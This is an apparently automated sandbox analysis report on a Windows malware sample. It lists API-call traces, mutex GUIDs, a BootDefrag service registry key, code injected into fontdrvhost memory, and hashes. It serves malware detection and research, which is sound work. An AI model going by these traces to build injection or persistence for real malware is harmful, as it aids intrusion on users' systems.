                                                                                                                                                                                                                                                                                      • Part of subcall function 0041A820: PathFileExistsW.SHLWAPI(?,?,?,?,?,00000000,00476569,000000FF,0041A806), ref: 0041A8F4
                                                                                                                                                                                                                                                                                      • Part of subcall function 0041A820: #165.SHELL32(00000000,?,?,?,?,?,00000000,00476569,000000FF,0041A806), ref: 0041A904
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    • SYSTEM\CurrentControlSet\services\BootDefrag, xrefs: 0041A7E5
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Path$#165CloseExistsFileFolderOpenSpecial
                                                                                                                                                                                                                                                                                    • String ID: SYSTEM\CurrentControlSet\services\BootDefrag
                                                                                                                                                                                                                                                                                    • API String ID: 1591709053-3464295076
                                                                                                                                                                                                                                                                                    • Opcode ID: b9cba828d4abfd53c5caf4397c6bd50ab3a665ffc0be6c91e1721a714c795c9e
                                                                                                                                                                                                                                                                                    • Instruction ID: 6a09b35f9698f17151a02b8af7ff6770b374517e2ed940df591338b91f7cf978
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b9cba828d4abfd53c5caf4397c6bd50ab3a665ffc0be6c91e1721a714c795c9e
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 02D012B0215200DAE314BBB1DC45B9E33A4EB40315F10492EB45AC1580CB7894998B6A
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • InterlockedExchange.KERNEL32(00497DDC,00000000), ref: 00401283
                                                                                                                                                                                                                                                                                    • CreateCompatibleDC.GDI32(00000000), ref: 00401295
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: CompatibleCreateExchangeInterlocked
                                                                                                                                                                                                                                                                                    • String ID: }I
                                                                                                                                                                                                                                                                                    • API String ID: 1770991917-1906338323
                                                                                                                                                                                                                                                                                    • Opcode ID: 6375a689964595e525005095ae3faa2c41de4e6904f8434c51eb6425be86f1fa
                                                                                                                                                                                                                                                                                    • Instruction ID: a163272bfcbb607c39215aeccd5f887c100e22747e7019c329861ded96e1c357
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6375a689964595e525005095ae3faa2c41de4e6904f8434c51eb6425be86f1fa
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 64D05E2390012056CA10521ABC48FE6672CAF91360F46427EF80DF71609329A8424AAC
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • InterlockedExchange.KERNEL32(00497DDC,00000000), ref: 004012B2
                                                                                                                                                                                                                                                                                    • DeleteDC.GDI32(00000000), ref: 004012C4
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: DeleteExchangeInterlocked
                                                                                                                                                                                                                                                                                    • String ID: }I
                                                                                                                                                                                                                                                                                    • API String ID: 1722977832-1906338323
                                                                                                                                                                                                                                                                                    • Opcode ID: 3d9252111c2499e9892cd810a91747644d22c1b39faee1d2a360d963c6ead329
                                                                                                                                                                                                                                                                                    • Instruction ID: 0f44d1f4ef78c4913e9163893a1f1e1819881c729740a469ce0397d160b8c871
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3d9252111c2499e9892cd810a91747644d22c1b39faee1d2a360d963c6ead329
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D1D05E678000205A9A04521ABC48CE7662CDE9536034A427EFC0DF3160D7299C428AAC
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • CreateMutexW.KERNEL32(00000000,00000000,{E0A52416-D56A-4c3d-BFC7-3F40E77C718E}), ref: 0041A782
                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 0041A793
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    • {E0A52416-D56A-4c3d-BFC7-3F40E77C718E}, xrefs: 0041A779
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: CreateErrorLastMutex
                                                                                                                                                                                                                                                                                    • String ID: {E0A52416-D56A-4c3d-BFC7-3F40E77C718E}
                                                                                                                                                                                                                                                                                    • API String ID: 1925916568-1835452401
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • CreateMutexW.KERNEL32(00000000,00000000,{4391F12D-936B-4037-9383-DCB800DF7B65}), ref: 0041A742
                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 0041A753
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    • {4391F12D-936B-4037-9383-DCB800DF7B65}, xrefs: 0041A739
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: CreateErrorLastMutex
                                                                                                                                                                                                                                                                                    • String ID: {4391F12D-936B-4037-9383-DCB800DF7B65}
                                                                                                                                                                                                                                                                                    • API String ID: 1925916568-3123431990
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,00000000,?,?), ref: 03220326
                                                                                                                                                                                                                                                                                      • Part of subcall function 032200A4: VirtualAlloc.KERNELBASE(00000000,00001012,00001000,00000004), ref: 032200CD
                                                                                                                                                                                                                                                                                      • Part of subcall function 032200A4: VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 03220279
                                                                                                                                                                                                                                                                                    • VirtualAlloc.KERNELBASE(00000000,00400000,00001000,00000004), ref: 03220378
                                                                                                                                                                                                                                                                                    • VirtualProtect.KERNELBASE(0000002C,?,00000040,?), ref: 032203E7
                                                                                                                                                                                                                                                                                    • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 03220407
                                                                                                                                                                                                                                                                                    • MapViewOfFile.KERNELBASE(?,00000004,00000000,00000000,00000000), ref: 0322042E
                                                                                                                                                                                                                                                                                    • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 03220456
                                                                                                                                                                                                                                                                                    • CloseHandle.KERNELBASE(?), ref: 03220471
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001E.00000003.2342953693.0000000003220000.00000040.00000001.00020000.00000000.sdmp, Offset: 03220000, based on PE: false
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_30_3_3220000_fontdrvhost.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Virtual$Alloc$Free$CloseFileHandleProtectView
                                                                                                                                                                                                                                                                                    • String ID: ,
                                                                                                                                                                                                                                                                                    • API String ID: 3867569247-3772416878
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • VirtualAlloc.KERNELBASE(00000000,00001012,00001000,00000004), ref: 032200CD
                                                                                                                                                                                                                                                                                    • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 03220279
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001E.00000003.2342953693.0000000003220000.00000040.00000001.00020000.00000000.sdmp, Offset: 03220000, based on PE: false
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_30_3_3220000_fontdrvhost.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Virtual$AllocFree
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 2087232378-0
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 03220279
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001E.00000003.2342953693.0000000003220000.00000040.00000001.00020000.00000000.sdmp, Offset: 03220000, based on PE: false
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_30_3_3220000_fontdrvhost.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: FreeVirtual
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 1263568516-0

                                                                                                                                                                                                                                                                                    Execution Graph

                                                                                                                                                                                                                                                                                    Execution Coverage:33.4%
                                                                                                                                                                                                                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                                                                    Signature Coverage:83.3%
                                                                                                                                                                                                                                                                                    Total number of Nodes:24
                                                                                                                                                                                                                                                                                    Total number of Limit Nodes:0

                                                                                                                                                                                                                                                                                    Callgraph

                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                    APIs
Memory Dump Source
• Source File: 00000022.00000002.2564565227.000001795E5A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001795E5A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_34_2_1795e5a0000_fontdrvhost.jbxd
Similarity
• API ID: AcceptCloseConnectHandlePort
• String ID:
• API String ID: 3811980168-0